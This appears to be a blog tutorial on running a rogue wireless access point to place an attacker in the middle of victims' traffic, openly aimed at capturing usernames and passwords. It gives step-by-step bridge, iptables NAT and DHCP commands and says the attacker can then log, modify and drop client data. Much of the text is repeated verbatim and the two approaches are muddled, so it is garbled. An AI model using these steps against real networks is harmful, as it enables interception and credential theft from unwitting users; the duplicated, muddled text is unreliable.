Capturing useful information (i.e. username/passwords etc..) from the users of the network has always been any hacker's primary motivation. It was easy to capture all data flowing in the network by putting your card in the promiscuous mode and running a sniffer when bridges and hubs were used in the networks. With the advent of the switches, as data was forwarded only to either the intended system (if in the same subnet) or the gateway, attacker had to be an MITM (Man In The Middle) to get the data from the victims.
ARP poisoning is the only way to get between an legitimate gateway and victim machine, where we poison ARP cache of the systems in the network changing gateway's MAC address to attacker's MAC by sending fake ARP replies. Attacker needs to be a part of your subnet for this trick to work. Given this background on MITM, lets move to how all this becomes very easy for an attacker in the wireless scenario.
As soon as wireless client connects to attacker's honeypot AP, attacker can either assign an IP address to the client by setting up a dhcp server or can just bridge the wired and wireless interface so that the client gets IP address from the enterprise network. Though i prefer the first approach as some enterprise networks might have static IP address allocations, i will explain both.
ARP poisoning is the only way to get between an legitimate gateway and victim machine, where we poison ARP cache of the systems in the network changing gateway's MAC address to attacker's MAC by sending fake ARP replies. Attacker needs to be a part of your subnet for this trick to work. Given this background on MITM, lets move to how all this becomes very easy for an attacker in the wireless scenario.
As soon as wireless client connects to attacker's honeypot AP, attacker can either assign an IP address to the client by setting up a dhcp server or can just bridge the wired and wireless interface so that the client gets IP address from the enterprise network. Though i prefer the first approach as some enterprise networks might have static IP address allocations, i will explain both.
Assumption : The wired interface(eth0) has internet connectivity.
First approach:
This approach will work only if wired interface gets IP address from the dhcp server. It goes the same way as already has been explained here, with the difference that you dont have to run dhcp server as you expect client connecting to your honeypot AP to get IP address from enterprise network. The additional step that you have to do is, creating a bridge between the wired and wireless interface.
#ip address flush dev eth0
#brctl addbr br0
#brctl addif br0 ath0 (ath0 is wireless interface)
#brctl addif br0 eth0
#ifconfig br0 up
#dhcpcd br0 (or dhclient, whatever is your dhcp client)
Second Approach: In this case, the honeypot AP acts as a NAT AP. After setting up honeypot AP, follow these steps:
#ifconfig ath0 up
#ifconfig ath0 10.0.0.1 netmask 255.255.255.0
#route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
#iptables --flush
#iptables --table nat --flush
#iptables --delete-chain
#iptables --table nat --delete-chain
#iptables -P FORWARD ACCEPT
#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward
Run dhcp server on wireless interface:
#dhcpd -d -f -cf /etc/dhcpd.conf ath0 &
Bingo!!! Now your honeypot AP is a NAT AP.
You can choose any of these approaches and now you are a MITM between the wireless client and Internet. Being a MITM, you can log, modify and drop the data (coming from/going to) the client.
We will see in the next posts, how we can go a step further and decipher all data even if the wireless client uses secure HTTP (https).
This approach will work only if wired interface gets IP address from the dhcp server. It goes the same way as already has been explained here, with the difference that you dont have to run dhcp server as you expect client connecting to your honeypot AP to get IP address from enterprise network. The additional step that you have to do is, creating a bridge between the wired and wireless interface.
#ip address flush dev eth0
#brctl addbr br0
#brctl addif br0 ath0 (ath0 is wireless interface)
#brctl addif br0 eth0
#ifconfig br0 up
#dhcpcd br0 (or dhclient, whatever is your dhcp client)
Second Approach: In this case, the honeypot AP acts as a NAT AP. After setting up honeypot AP, follow these steps:
#ifconfig ath0 up
#ifconfig ath0 10.0.0.1 netmask 255.255.255.0
#route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
#iptables --flush
#iptables --table nat --flush
#iptables --delete-chain
#iptables --table nat --delete-chain
#iptables -P FORWARD ACCEPT
#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward
Run dhcp server on wireless interface:
#dhcpd -d -f -cf /etc/dhcpd.conf ath0 &
Bingo!!! Now your honeypot AP is a NAT AP.
You can choose any of these approaches and now you are a MITM between the wireless client and Internet. Being a MITM, you can log, modify and drop the data (coming from/going to) the client.
We will see in the next posts, how we can go a step further and decipher all data even if the wireless client uses secure HTTP (https).
No comments:
Post a Comment